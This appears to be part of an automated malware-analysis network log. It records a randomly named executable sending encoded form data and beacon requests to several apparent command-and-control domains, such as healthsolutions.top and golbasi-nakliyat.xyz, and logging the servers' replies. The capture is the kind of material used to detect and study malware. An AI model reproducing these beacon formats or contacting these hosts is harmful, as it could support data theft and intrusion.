                        Sep 3, 2024 10:46:08.910420895 CEST439OUTGET /yzen/?Qd=O9V9WpJA2Id3CQ8eXizaOlP9WjrM4aluQNnrI8f3VjqE97lt7JSCdbE8JrYB0ARmCvuQ5PpqBCp66EiUa7dY6YydUJ+eQOaY3qqiNVkH5/URE6MIj12/bE0=&0z=mDcdcR8 HTTP/1.1
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Language: en-us
                        Connection: close
                        Host: www.dfbio.net
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                        Sep 3, 2024 10:46:09.873079062 CEST1236INHTTP/1.1 404 Not Found
                        Server: wts/1.7.0
                        Date: Tue, 03 Sep 2024 08:46:09 GMT
                        Content-Type: text/html; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        Cache-Control: private
                        Strict-Transport-Security: max-age=31536000
                        Data Raw: 31 32 66 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 31 30 2e 30 20 e8 af a6 e7 bb 86 e9 94 99 e8 af af 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a [TRUNCATED]
                        Data Ascii: 12ff<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 10.0 - 404.0 - Not Found</title> <style type="text/css"> ... body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{margin:0;font-size:1.4em;word-wrap:break-word;} ul,ol{margin:10px 0 10px 5px;} ul.first,ol.first{margin-top:5px;} fieldset{padding:0 15px 10px 15px;word-break:break-all;} .summary-container fieldset{padding-bottom:5px;margin-top:4px;} legend.no-expand-all{padding:2px 15px 4px 10px;margin:0 0 0 -12px;} legend{color:#333333;;margin:4px 0 8px -12px;_margin-top:0px; font-weight:bold;font-size:1em;} a:link,a:visited{color:#007EFF;font-weight:bold;} a:hover{text-decoration:none;} h1{font-size:2.4em;margin:0;
                        Sep 3, 2024 10:46:09.873096943 CEST1236INData Raw: 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 20 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 6d 61 72 67
                        Data Ascii: color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.4em;margin:10px 0 0 0;color:#CC0000;} h4{font-size:1.2em;margin:10px 0 5px 0; }#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS",Verdan
                        Sep 3, 2024 10:46:09.873106956 CEST1236INData Raw: 63 6f 64 65 7b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 69 74 61 6c 69 63 3b 7d 20 0a 2e 63 6c 65 61 72 7b 63 6c 65 61 72 3a 62 6f 74 68 3b 7d 20 0a 2e 70 72 65
                        Data Ascii: code{color:#CC0000;font-weight:bold;font-style:italic;} .clear{clear:both;} .preferred{padding:0 5px 2px 5px;font-weight:normal;background:#006633;color:#FFF;font-size:.8em;} --> </style> </head> <body> <div id="content"> <div class=
                        Sep 3, 2024 10:46:09.873119116 CEST1236INData Raw: 22 3e 20 0a 20 20 20 3c 74 61 62 6c 65 20 62 6f 72 64 65 72 3d 22 30 22 20 63 65 6c 6c 70 61 64 64 69 6e 67 3d 22 30 22 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 22 30 22 3e 20 0a 20 20 20 20 3c 74 72 20 63 6c 61 73 73 3d 22 61 6c 74 22 3e 3c 74 68
                        Data Ascii: "> <table border="0" cellpadding="0" cellspacing="0"> <tr class="alt"><th></th><td>&nbsp;&nbsp;&nbsp;IIS Web Core</td></tr> <tr><th></th><td>&nbsp;&nbsp;&nbsp;MapRequestHandler</td></tr> <tr class="alt"><th>
                        Sep 3, 2024 10:46:09.873128891 CEST193INData Raw: 20 3c 70 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6f 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 66 77 6c 69 6e 6b 2f 3f 4c 69 6e 6b 49 44 3d 36 32 32 39 33 26 61 6d 70 3b 49 49 53 37 30 45 72 72 6f 72 3d 34 30 34 2c 30 2c 30 78
                        Data Ascii: <p><a href="https://go.microsoft.com/fwlink/?LinkID=62293&amp;IIS70Error=404,0,0x80070002,17763"> &raquo;</a></p> </fieldset> </div> </div> </body> </html> 0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        33192.168.2.46501113.248.169.48804908C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe
                        TimestampBytes transferredDirectionData
                        Sep 3, 2024 10:46:15.750397921 CEST733OUTPOST /cent/ HTTP/1.1
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-us
                        Connection: close
                        Content-Type: application/x-www-form-urlencoded
                        Cache-Control: max-age=0
                        Content-Length: 199
                        Host: www.healthsolutions.top
                        Origin: http://www.healthsolutions.top
                        Referer: http://www.healthsolutions.top/cent/
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                        Data Raw: 51 64 3d 6f 33 43 74 31 34 41 68 64 45 6d 58 34 41 37 32 32 4f 4a 61 65 38 55 65 6e 6a 72 34 57 37 4e 70 7a 2b 55 70 48 31 69 4e 62 70 36 77 4b 70 33 31 34 6d 56 44 4e 4e 38 61 74 76 39 52 4f 73 4d 52 45 30 4c 4d 42 37 55 4a 75 43 6f 38 62 48 6e 4f 52 4c 33 73 74 45 30 79 79 4c 44 66 33 34 4a 54 33 35 64 47 78 6d 4b 56 49 42 48 4b 45 70 7a 2f 51 43 31 53 47 43 53 5a 48 70 77 66 6c 6a 43 53 57 2b 4f 31 34 38 34 6a 4c 48 42 77 78 6d 4e 53 37 62 61 79 59 50 75 51 79 4b 79 55 53 38 4f 32 6b 41 41 39 5a 44 2b 56 7a 6f 79 4a 4c 64 47 37 43 6f 6a 64 58 45 53 5a 49 57 78 6a 5a 4f 65 69 39 41 3d 3d
                        Data Ascii: Qd=o3Ct14AhdEmX4A722OJae8Uenjr4W7Npz+UpH1iNbp6wKp314mVDNN8atv9ROsMRE0LMB7UJuCo8bHnORL3stE0yyLDf34JT35dGxmKVIBHKEpz/QC1SGCSZHpwfljCSW+O1484jLHBwxmNS7bayYPuQyKyUS8O2kAA9ZD+VzoyJLdG7CojdXESZIWxjZOei9A==


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        34192.168.2.46501213.248.169.48804908C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe
                        TimestampBytes transferredDirectionData
                        Sep 3, 2024 10:46:18.400696993 CEST753OUTPOST /cent/ HTTP/1.1
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-us
                        Connection: close
                        Content-Type: application/x-www-form-urlencoded
                        Cache-Control: max-age=0
                        Content-Length: 219
                        Host: www.healthsolutions.top
                        Origin: http://www.healthsolutions.top
                        Referer: http://www.healthsolutions.top/cent/
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                        Data Raw: 51 64 3d 6f 33 43 74 31 34 41 68 64 45 6d 58 35 68 4c 32 36 4e 68 61 5a 63 55 52 6f 44 72 34 44 4c 4e 74 7a 2b 51 70 48 31 4b 64 61 61 4f 77 45 72 2f 31 37 69 68 44 59 4e 38 61 6c 50 39 55 57 4d 4d 50 45 30 4f 35 42 2f 55 4a 75 44 49 38 62 43 44 4f 52 63 62 76 73 55 30 4b 35 72 44 64 70 49 4a 54 33 35 64 47 78 6d 4f 2f 49 42 66 4b 45 5a 44 2f 53 6e 5a 52 61 79 53 61 45 70 77 66 76 44 44 62 57 2b 50 51 34 34 5a 72 4c 45 70 77 78 6d 39 53 31 71 61 31 57 50 75 65 38 71 7a 72 62 4d 48 62 6d 77 46 6d 47 44 66 37 73 35 2f 75 4b 62 58 68 54 5a 43 4b 46 45 32 71 56 52 34 58 55 4e 6a 72 6d 4e 59 58 53 70 36 39 68 37 55 44 48 42 38 43 56 78 42 6c 51 67 30 3d
                        Data Ascii: Qd=o3Ct14AhdEmX5hL26NhaZcURoDr4DLNtz+QpH1KdaaOwEr/17ihDYN8alP9UWMMPE0O5B/UJuDI8bCDORcbvsU0K5rDdpIJT35dGxmO/IBfKEZD/SnZRaySaEpwfvDDbW+PQ44ZrLEpwxm9S1qa1WPue8qzrbMHbmwFmGDf7s5/uKbXhTZCKFE2qVR4XUNjrmNYXSp69h7UDHB8CVxBlQg0=


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        35192.168.2.46501313.248.169.48804908C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe
                        TimestampBytes transferredDirectionData
                        Sep 3, 2024 10:46:20.992312908 CEST10835OUTPOST /cent/ HTTP/1.1
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-us
                        Connection: close
                        Content-Type: application/x-www-form-urlencoded
                        Cache-Control: max-age=0
                        Content-Length: 10299
                        Host: www.healthsolutions.top
                        Origin: http://www.healthsolutions.top
                        Referer: http://www.healthsolutions.top/cent/
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                        Data Raw: 51 64 3d 6f 33 43 74 31 34 41 68 64 45 6d 58 35 68 4c 32 36 4e 68 61 5a 63 55 52 6f 44 72 34 44 4c 4e 74 7a 2b 51 70 48 31 4b 64 61 62 32 77 45 65 7a 31 34 46 39 44 4b 39 38 61 76 76 39 56 57 4d 4e 4b 45 30 32 39 42 2f 51 7a 75 48 34 38 55 45 66 4f 47 2b 6a 76 6c 55 30 4b 32 4c 44 59 33 34 4a 38 33 35 4e 43 78 6d 65 2f 49 42 66 4b 45 62 62 2f 62 53 31 52 4a 69 53 5a 48 70 77 62 6c 6a 44 7a 57 2b 33 6d 34 34 64 37 4c 31 4a 77 78 43 5a 53 35 34 69 31 65 50 75 63 37 71 7a 7a 62 4d 62 59 6d 77 5a 71 47 44 71 67 73 35 37 75 4c 2f 57 6e 4b 6f 47 33 58 6e 6d 79 57 42 34 55 51 75 4c 6d 76 4e 41 44 64 5a 69 6c 37 6f 49 53 4e 53 64 50 41 77 45 6c 4d 32 54 6e 6d 41 71 36 51 2f 4f 37 39 71 4f 61 46 42 35 57 2f 6f 44 6c 46 52 6e 71 55 6d 32 69 47 55 4f 57 70 67 6f 69 61 49 64 54 57 49 75 35 74 42 69 39 53 45 44 52 6b 4c 50 49 47 79 2b 52 62 68 4d 72 75 34 2b 56 38 41 73 34 46 76 52 32 61 66 37 37 67 45 4d 79 34 4b 2b 47 2f 78 62 31 31 47 4c 55 43 43 63 2f 30 69 53 36 34 35 79 68 33 44 43 71 6b 79 75 4b 33 4f 79 [TRUNCATED]
                        Data Ascii: Qd=o3Ct14AhdEmX5hL26NhaZcURoDr4DLNtz+QpH1Kdab2wEez14F9DK98avv9VWMNKE029B/QzuH48UEfOG+jvlU0K2LDY34J835NCxme/IBfKEbb/bS1RJiSZHpwbljDzW+3m44d7L1JwxCZS54i1ePuc7qzzbMbYmwZqGDqgs57uL/WnKoG3XnmyWB4UQuLmvNADdZil7oISNSdPAwElM2TnmAq6Q/O79qOaFB5W/oDlFRnqUm2iGUOWpgoiaIdTWIu5tBi9SEDRkLPIGy+RbhMru4+V8As4FvR2af77gEMy4K+G/xb11GLUCCc/0iS645yh3DCqkyuK3OyJJ9NBbB5M2rstCFVe+7DANpLdYzL94wD6I923Giv7aNLAYROiYMuxT2FHqDX0bn6o9xuiP2ew7h9zPSWbwOskjuAGE5vsm6xBHDVYmsUd7oEM0xyBu2wHgAt8gw53gzm9xglI8uH9jYe/vo8Y+S6O1RJFLeQK8BWawbtPy1XaQZVRzDCqZ3nvjQAFe25MgHNx1D+DsZA3AUUO4BsjC5EagfXOqPH1fM3PyK0prTy/6IyDS0OAVJe0YpULeaZSjzG+chnx8Z705qB4OJKxkZJLi7ckUwbVfqa6Wg4E4LxPxcm7dj0dKMIyopRa6hLQ8CTSE00/VPZhD6L1cP1ZfmdXiSG+TyPyVuJmn3KY8jAIoqW5z01XT8UMFRIH5qsCkT6yQTHqKAY+O9C7vJD9cJqUYMi8XTd6T0jXCdoyRi34uBciJPDp1v7Ok6hUbvBHry7XQ69CNEHsLX9Up7B/Axd3G04YEhGXspy9b2jBsZBjCCM21D01LsCS7mR1+EKWOr7mE5ZCTfJLWIGWKDpreifxMYSHdXR0jLR5heiQMQAJcmqia2qr+HLzJN67zLclrSObLz1fS0JGX03uoxEYXo1SwcA1glBXClxV/l+EOAKgucuOoi2FihgnErsTtEF14mU6RoGPLiiav0b1pqc2eRT8cnOB7hxo8Eqsq [TRUNCATED]


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        36192.168.2.46501413.248.169.48804908C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe
                        TimestampBytes transferredDirectionData
                        Sep 3, 2024 10:46:23.549416065 CEST449OUTGET /cent/?0z=mDcdcR8&Qd=l1qN2MMhbl/x2ijL+cYxGoEcoDCmCINS+YU1HxWhb8Kqe535lkNGafx30NgxGLIJJEStArUmzXIrZ0bzKO7vv1M79bDO++JJrrxc/WvjehfCDuj8XmxnNRs= HTTP/1.1
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Language: en-us
                        Connection: close
                        Host: www.healthsolutions.top
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                        Sep 3, 2024 10:46:24.035274029 CEST389INHTTP/1.1 200 OK
                        Server: openresty
                        Date: Tue, 03 Sep 2024 08:46:23 GMT
                        Content-Type: text/html
                        Content-Length: 249
                        Connection: close
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 30 7a 3d 6d 44 63 64 63 52 38 26 51 64 3d 6c 31 71 4e 32 4d 4d 68 62 6c 2f 78 32 69 6a 4c 2b 63 59 78 47 6f 45 63 6f 44 43 6d 43 49 4e 53 2b 59 55 31 48 78 57 68 62 38 4b 71 65 35 33 35 6c 6b 4e 47 61 66 78 33 30 4e 67 78 47 4c 49 4a 4a 45 53 74 41 72 55 6d 7a 58 49 72 5a 30 62 7a 4b 4f 37 76 76 31 4d 37 39 62 44 4f 2b 2b 4a 4a 72 72 78 63 2f 57 76 6a 65 68 66 43 44 75 6a 38 58 6d 78 6e 4e 52 73 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?0z=mDcdcR8&Qd=l1qN2MMhbl/x2ijL+cYxGoEcoDCmCINS+YU1HxWhb8Kqe535lkNGafx30NgxGLIJJEStArUmzXIrZ0bzKO7vv1M79bDO++JJrrxc/WvjehfCDuj8XmxnNRs="}</script></head></html>


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        37192.168.2.46501585.159.66.93804908C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe
                        TimestampBytes transferredDirectionData
                        Sep 3, 2024 10:46:37.280910969 CEST736OUTPOST /gxi9/ HTTP/1.1
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-us
                        Connection: close
                        Content-Type: application/x-www-form-urlencoded
                        Cache-Control: max-age=0
                        Content-Length: 199
                        Host: www.golbasi-nakliyat.xyz
                        Origin: http://www.golbasi-nakliyat.xyz
                        Referer: http://www.golbasi-nakliyat.xyz/gxi9/
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                        Data Raw: 51 64 3d 5a 70 64 53 61 4d 6b 47 39 6c 48 6e 41 74 46 33 44 57 49 33 34 61 56 34 42 69 76 45 55 74 73 71 4a 74 52 2b 31 31 4a 6a 48 71 38 42 4c 65 39 61 52 68 46 47 4e 38 6f 6f 69 6e 73 76 5a 53 6b 33 77 54 35 31 57 69 34 6d 71 70 78 6c 71 43 4a 4f 37 4f 56 6f 74 71 5a 34 66 31 4e 57 6e 68 52 4f 54 6a 69 51 67 6f 52 6c 69 76 55 34 52 78 47 63 6a 2b 6d 6d 41 64 47 7a 77 74 4c 6b 65 73 61 4e 41 52 50 51 57 6d 4e 30 49 46 6a 41 54 39 58 65 69 78 48 5a 38 76 34 6b 37 30 30 48 63 34 7a 73 72 61 65 57 36 6d 74 79 41 39 4c 79 43 63 4a 47 39 39 7a 43 47 52 46 38 66 6c 2b 31 55 72 4f 4d 53 51 3d 3d
                        Data Ascii: Qd=ZpdSaMkG9lHnAtF3DWI34aV4BivEUtsqJtR+11JjHq8BLe9aRhFGN8ooinsvZSk3wT51Wi4mqpxlqCJO7OVotqZ4f1NWnhROTjiQgoRlivU4RxGcj+mmAdGzwtLkesaNARPQWmN0IFjAT9XeixHZ8v4k700Hc4zsraeW6mtyA9LyCcJG99zCGRF8fl+1UrOMSQ==
                        Sep 3, 2024 10:46:37.934391975 CEST225INHTTP/1.1 404 Not Found
                        Server: nginx/1.14.1
                        Date: Tue, 03 Sep 2024 08:46:37 GMT
                        Content-Length: 0
                        Connection: close
                        X-Rate-Limit-Limit: 5s
                        X-Rate-Limit-Remaining: 19
                        X-Rate-Limit-Reset: 2024-09-03T08:46:42.8280947Z


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        38192.168.2.46501685.159.66.93804908C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe
                        TimestampBytes transferredDirectionData
                        Sep 3, 2024 10:46:39.831772089 CEST756OUTPOST /gxi9/ HTTP/1.1
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-us
                        Connection: close
                        Content-Type: application/x-www-form-urlencoded
                        Cache-Control: max-age=0
                        Content-Length: 219
                        Host: www.golbasi-nakliyat.xyz
                        Origin: http://www.golbasi-nakliyat.xyz
                        Referer: http://www.golbasi-nakliyat.xyz/gxi9/
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                        Data Raw: 51 64 3d 5a 70 64 53 61 4d 6b 47 39 6c 48 6e 41 4e 56 33 51 6c 67 33 2f 36 56 37 4c 43 76 45 65 4e 73 75 4a 74 64 2b 31 30 4e 7a 53 49 59 42 4d 36 35 61 51 6b 70 47 4d 38 6f 6f 71 48 73 71 64 53 6b 77 77 54 30 4b 57 67 38 6d 71 70 4e 6c 71 44 35 4f 37 64 39 76 74 36 5a 36 45 46 4e 55 36 52 52 4f 54 6a 69 51 67 6f 55 79 69 76 4d 34 53 42 57 63 69 61 36 68 49 39 47 30 33 74 4c 6b 61 73 61 52 41 52 50 79 57 6b 35 53 49 47 58 41 54 34 72 65 68 6c 54 47 79 76 34 69 6c 30 31 4b 63 70 79 68 6e 61 4f 59 2b 6c 46 4c 43 63 6a 6d 44 61 59 63 73 4d 53 56 55 52 68 50 43 69 33 42 5a 6f 7a 46 4a 53 6a 63 6d 32 30 63 74 72 68 72 4b 5a 46 73 79 67 69 70 4e 59 73 3d
                        Data Ascii: Qd=ZpdSaMkG9lHnANV3Qlg3/6V7LCvEeNsuJtd+10NzSIYBM65aQkpGM8ooqHsqdSkwwT0KWg8mqpNlqD5O7d9vt6Z6EFNU6RROTjiQgoUyivM4SBWcia6hI9G03tLkasaRARPyWk5SIGXAT4rehlTGyv4il01KcpyhnaOY+lFLCcjmDaYcsMSVURhPCi3BZozFJSjcm20ctrhrKZFsygipNYs=
                        Sep 3, 2024 10:46:40.500349998 CEST225INHTTP/1.1 404 Not Found
                        Server: nginx/1.14.1
                        Date: Tue, 03 Sep 2024 08:46:40 GMT
                        Content-Length: 0
                        Connection: close
                        X-Rate-Limit-Limit: 5s
                        X-Rate-Limit-Remaining: 18
                        X-Rate-Limit-Reset: 2024-09-03T08:46:42.8280947Z


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        39192.168.2.46501785.159.66.93804908C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe
                        TimestampBytes transferredDirectionData
                        Sep 3, 2024 10:46:42.378850937 CEST10838OUTPOST /gxi9/ HTTP/1.1
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-us
                        Connection: close
                        Content-Type: application/x-www-form-urlencoded
                        Cache-Control: max-age=0
                        Content-Length: 10299
                        Host: www.golbasi-nakliyat.xyz
                        Origin: http://www.golbasi-nakliyat.xyz
                        Referer: http://www.golbasi-nakliyat.xyz/gxi9/
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                        Data Raw: 51 64 3d 5a 70 64 53 61 4d 6b 47 39 6c 48 6e 41 4e 56 33 51 6c 67 33 2f 36 56 37 4c 43 76 45 65 4e 73 75 4a 74 64 2b 31 30 4e 7a 53 49 51 42 4d 50 74 61 52 48 78 47 4b 4d 6f 6f 6b 6e 73 72 64 53 6c 73 77 51 45 4f 57 67 77 63 71 76 42 6c 72 67 68 4f 73 38 39 76 6d 36 5a 36 4d 6c 4e 56 6e 68 51 55 54 6a 79 55 67 6f 45 79 69 76 4d 34 53 48 79 63 79 2b 6d 68 4b 39 47 7a 77 74 4c 6f 65 73 61 74 41 56 61 4e 57 6b 74 6b 49 31 50 41 54 5a 62 65 6e 57 72 47 36 76 34 67 67 30 30 5a 63 73 72 68 6e 62 6a 6e 2b 6b 78 74 43 66 2f 6d 42 2b 31 57 78 4f 61 6f 4a 68 4a 4f 43 31 72 4b 52 36 66 77 49 46 54 77 6a 54 34 59 37 70 39 48 52 5a 6f 2f 31 51 43 6f 55 66 42 74 55 73 51 31 6b 33 74 50 4f 75 4b 73 41 6d 79 38 59 54 53 43 65 7a 58 77 44 57 66 50 78 6e 68 6e 49 63 4c 76 67 58 68 7a 6f 70 62 36 7a 4a 5a 74 35 45 55 6f 33 38 4e 4c 32 33 4f 6b 42 61 77 6b 4f 2f 47 54 43 39 57 37 70 52 2b 46 47 44 32 5a 73 74 33 43 64 70 53 35 2f 4f 53 41 35 72 39 6f 79 6a 53 69 52 76 35 59 51 33 6c 6a 58 2f 50 79 67 70 4b 41 64 6f 56 [TRUNCATED]
                        Data Ascii: Qd=ZpdSaMkG9lHnANV3Qlg3/6V7LCvEeNsuJtd+10NzSIQBMPtaRHxGKMooknsrdSlswQEOWgwcqvBlrghOs89vm6Z6MlNVnhQUTjyUgoEyivM4SHycy+mhK9GzwtLoesatAVaNWktkI1PATZbenWrG6v4gg00Zcsrhnbjn+kxtCf/mB+1WxOaoJhJOC1rKR6fwIFTwjT4Y7p9HRZo/1QCoUfBtUsQ1k3tPOuKsAmy8YTSCezXwDWfPxnhnIcLvgXhzopb6zJZt5EUo38NL23OkBawkO/GTC9W7pR+FGD2Zst3CdpS5/OSA5r9oyjSiRv5YQ3ljX/PygpKAdoVpzlJL3CxkV8/avv11ofVF1m3nCMPJqrovRCgkWwoWG5Cx+JDVVBqPxYyoT+tPGC3MiuML0pX05hpxrO87BGRV+NdBJpUJJsxhHKrznzg4aT/A0GdORY3hfo+F9b9LlLJPvX3bQc0Jt1gwiGiU+9dKXzhIIPsYcwznKrtA+CMYejgZrWM9MzIjmNFxMMc/ElmEc9IwXTC/kKB/D/A4Q6GM/Bz+j84TJ23badzi2M73onQiDfFCtq3Z+VodIu/R6QowRy0IP299IJGy7wrM1KzyIlI3+T1QN2vLgTdt46Usp2AEtunUvfj33OTH/2x63pscy5DWGoMkOvvofHYCF9Pr5TUr9XySdHgSFDIydX0VTTBvvGUpK3mFEpHeG7xI1xqAejmNDovALrOijWAyRlLRqZcIkNXu3U3oIw9x8xtXKXXcTdHJXkoNYI8LFH+b7rJHKIQJoEdg3beB/xRJT+b9gmBFsD3MSVa+f09D9/4Ydj3lYCbVsG+8xNdcoKOoLxhElRk9r69nDhDCGWEJJnGnxUML5djTuqI6h8uZFq4VbOgIyLDIprVKepSxivvpy0GAUFbSlBo5TWjQOO7pN2Obr6cN0sNE6B8JasbhxkcZq02dMaDHL7ufL8cTPx30Vc6dygrFXn4+PstaEgOyUZTwrVNZeDwAfg2ZY [TRUNCATED]
                        Sep 3, 2024 10:46:43.036572933 CEST225INHTTP/1.1 404 Not Found
                        Server: nginx/1.14.1
                        Date: Tue, 03 Sep 2024 08:46:42 GMT
                        Content-Length: 0
                        Connection: close
                        X-Rate-Limit-Limit: 5s
                        X-Rate-Limit-Remaining: 19
                        X-Rate-Limit-Reset: 2024-09-03T08:46:47.9266839Z


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        40192.168.2.46501885.159.66.93804908C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe
                        TimestampBytes transferredDirectionData
                        Sep 3, 2024 10:46:44.921449900 CEST450OUTGET /gxi9/?Qd=Ur1yZ7cx/WDhKbJaAn0jkNNLDG3pddkDLNR9jSxILeo8Td4MSncFddMj031fez90w2sTSD8IzMd3myhBgMNGmZp5Mlx2w1QvKSGogY0wmO8HURKJraqBGaM=&0z=mDcdcR8 HTTP/1.1
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Language: en-us
                        Connection: close
                        Host: www.golbasi-nakliyat.xyz
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                        Sep 3, 2024 10:46:45.583260059 CEST225INHTTP/1.1 404 Not Found
                        Server: nginx/1.14.1
